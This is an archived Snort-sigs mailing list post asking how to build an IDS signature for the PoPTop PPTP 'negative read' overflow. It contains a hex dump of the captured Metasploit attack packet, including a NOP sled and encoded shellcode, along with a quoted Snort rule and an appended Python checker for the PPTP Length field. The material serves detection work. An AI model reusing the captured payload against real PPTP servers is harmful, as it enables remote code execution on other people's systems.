[Snort-sigs] Poptop Negative Read Overflow

Coen Bakkers, Monitored Security coen.bakkers at ...1134...
Sat Apr 24 15:27:08 EDT 2004


Hi,

I am trying to write a rule to catch the PoPTop exploit executed on Metasploit 2.0.

Basically this is the dump:

23:51:10.281639 10.251.0.3.35742 > 10.251.0.3.1723: P [tcp sum ok] 0:408(408) ack 1 win 32767 <nop,nop,timestamp 1488438 1488438>: pptp Length=1 CTRL-MSG Magic-Cookie=1a2b3c4d CTRL_MSGTYPE=SCCRQ PROTO_VER(1.0) FRAME_CAP(A) BEARER_CAP(A) MAX_CHAN(0) FIRM_REV(2600) HOSTNAME() VENDOR(Microsoft Windows NT) (DF) (ttl 64, id 5640, len 460)
0x0000   4500 01cc 1608 4000 4006 0d29 0afb 0003        E.....@.@..)....
0x0010   0afb 0003 8b9e 06bb 1999 a031 1900 761b        ...........1..v.
0x0020   8018 7fff 5312 0000 0101 080a 0016 b636        ....S..........6
0x0030   0016 b636 0001 0001 1a2b 3c4d 0001 0000        ...6.....+<M....
0x0040   0100 0000 0000 0001 0000 0001 0000 0a28        ...............(
0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0060   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0070   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0080   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0090   4d69 6372 6f73 6f66 7420 5769 6e64 6f77        Microsoft.Window
0x00a0   7320 4e54 0000 0000 0000 0000 0000 0000        s.NT............
0x00b0   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x00c0   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x00d0   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x00e0   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x00f0   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x0100   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x0110   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x0120   9090 9081 c4c0 fbff ffd9 eed9 7424 f45b        ............t$.[
0x0130   31c9 b11b 8173 1701 0101 0183 ebfc e2f4        1....s..........
0x0140   88e4 30c1 30da 4251 6b00 6b03 88e0 b167        ..0.0.BQk.k....g
0x0150   cc81 690b fa01 0269 0301 0ea1 88e0 6b11        ..i....i......k.
0x0160   5051 88e0 5130 c1b1 67b2 02cc 8184 c179        PQ..Q0..g......y
0x0170   324a 88d8 30c1 5ab1 3ecc 8148 78f8 30c1        2J..0.Z.>..Hx.0.
0x0180   30da 30c8 30d3 b1a5 cc81 30c1 5188 e369        0.0.0.....0.Q..i
0x0190   2e2e 7269 692e 6368 6f88 e251 528c 0d25        ..rii.cho..QR..%
0x01a0   b10a cc81 30c1 41cc 8101 0101 00fa ffbf        ....0.A.........
0x01b0   00fa ffbf 00fa ffbf 00fa ffbf 00fa ffbf        ................
0x01c0   00fa ffbf 00fa ffbf 00fa ffbf                  ............

I would like it to trigger on the Length=1 value of the PPTP header as it can be an indicator of the exploit, or am I wrong?

Probably the rule would be similar to the one found in the rules:

alert tcp $EXTERNAL_NET any -> $HOME_NET 1723 (msg:"MISC Microsoft PPTP Start Control Request buffer overflow attempt"; flow:to_server,established,no_stream; content:"|00 01|"; offset:2; depth:2; content:"|00 01|"; offset:8; depth:2; dsize:>156; reference:bugtraq,5807; reference:cve,CAN-2002-1214; classtype:attempted-admin; sid:2126; rev:2;)
I have tried to play around with it as a template to get it to work, but it doesn't, because I am not sure where the PPTP header starts in the dump.
Any help on this, as well as an explanation of where the PPTP header starts in the dump, would be appreciated.
Thanks,
Coen Bakkers
Security Analyst
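The two questions in the post (where the PPTP header starts in that dump, and whether Length=1 is an anomaly worth matching on) can be answered by walking the headers. The following is an added Python example, not part of the original post and not Snort code: it parses the header lines of the hex dump quoted above, uses the IPv4 IHL and TCP data offset to find the start of the TCP payload, and compares the PPTP Length field with the real payload size. `build_packet` and `benign_sccrq` are assumed helpers that construct a well-formed control message as a control case; their addresses and ports are placeholders.

```python
import struct

# The first five lines of the tcpdump hex dump quoted in the post (packet
# offsets 0x0000-0x004f). The rest of the packet is not needed: the IPv4
# total-length field tells us how long the TCP payload is.
DUMP_LINES = """
0x0000   4500 01cc 1608 4000 4006 0d29 0afb 0003
0x0010   0afb 0003 8b9e 06bb 1999 a031 1900 761b
0x0020   8018 7fff 5312 0000 0101 080a 0016 b636
0x0030   0016 b636 0001 0001 1a2b 3c4d 0001 0000
0x0040   0100 0000 0000 0001 0000 0001 0000 0a28
"""

PPTP_MAGIC_COOKIE = 0x1A2B3C4D
PPTP_CTRL_MESSAGE = 1       # PPTP message type: control message
PPTP_SCCRQ = 1              # control message type: Start-Control-Connection-Request
PPTP_CTRL_HEADER_LEN = 12   # Length, Type, Magic Cookie, Ctrl Msg Type, Reserved0


def parse_hexdump(text):
    """Turn tcpdump -x style lines ('0xNNNN  hhhh hhhh ...') into raw bytes.
    Only the eight 16-bit groups after the offset are read, so a trailing
    ASCII column, if present, is ignored."""
    out = bytearray()
    for line in text.strip().splitlines():
        parts = line.split()
        for group in parts[1:9]:
            out.extend(bytes.fromhex(group))
    return bytes(out)


def locate_pptp(packet):
    """Return (offset of the PPTP control header, TCP payload length).
    The header starts where the TCP payload starts: after the IPv4 header
    (IHL * 4 bytes) and the TCP header (data offset * 4 bytes)."""
    ihl = (packet[0] & 0x0F) * 4
    ip_total_len = struct.unpack("!H", packet[2:4])[0]
    tcp_data_off = (packet[ihl + 12] >> 4) * 4
    payload_off = ihl + tcp_data_off
    return payload_off, ip_total_len - payload_off


def check_pptp_ctrl(packet):
    """Sanity-check the PPTP control header against the TCP payload length."""
    off, payload_len = locate_pptp(packet)
    length, msg_type, cookie, ctrl_type = struct.unpack("!HHIH", packet[off:off + 10])
    findings = []
    if cookie != PPTP_MAGIC_COOKIE:
        findings.append("magic cookie 0x%08x is not 0x1a2b3c4d" % cookie)
    if msg_type != PPTP_CTRL_MESSAGE:
        findings.append("PPTP message type %d is not a control message" % msg_type)
    # RFC 2637: Length is the total size of the control message, header included,
    # so anything below the 12-byte header can never be a legitimate value.
    if length < PPTP_CTRL_HEADER_LEN:
        findings.append("Length field %d is smaller than the %d-byte control header"
                        % (length, PPTP_CTRL_HEADER_LEN))
    if length != payload_len:
        findings.append("Length field %d disagrees with the %d-byte TCP payload"
                        % (length, payload_len))
    return {
        "pptp_offset": off,
        "payload_len": payload_len,
        "length_field": length,
        "ctrl_msg_type": ctrl_type,
        "findings": findings,
        "suspicious": bool(findings),
    }


def build_packet(payload):
    """Wrap a PPTP control message in a minimal IPv4 + TCP header (no options).
    Constructed test data, not a capture; addresses and ports are placeholders."""
    ip_total = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_total, 0, 0x4000, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 1723, 0, 0, 5 << 4, 0x18, 32767, 0, 0)
    return ip + tcp + payload


def benign_sccrq():
    """A well-formed 156-byte SCCRQ whose Length field matches its size."""
    header = struct.pack("!HHIHH", 156, PPTP_CTRL_MESSAGE, PPTP_MAGIC_COOKIE, PPTP_SCCRQ, 0)
    return header + bytes(156 - len(header))


if __name__ == "__main__":
    for name, pkt in (("post's dump", parse_hexdump(DUMP_LINES)),
                      ("benign SCCRQ", build_packet(benign_sccrq()))):
        print(name, check_pptp_ctrl(pkt))
```

In the quoted dump IHL is 5 and the TCP data offset is 8 (the timestamp option), so the PPTP control header starts 52 bytes (0x34) into the packet, which is byte 0 of the TCP payload. That payload origin is also what Snort's `offset`/`depth` count from, which is why the quoted sid:2126 rule looks for the message type at offset 2 and the SCCRQ control message type at offset 8; the Length field sits at offset 0. Here it reads 1 while the segment carries 408 bytes, so a check on the Length field (below 12, or unequal to the payload size) is a more durable indicator than the 0x90 run, which a sender can vary freely.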
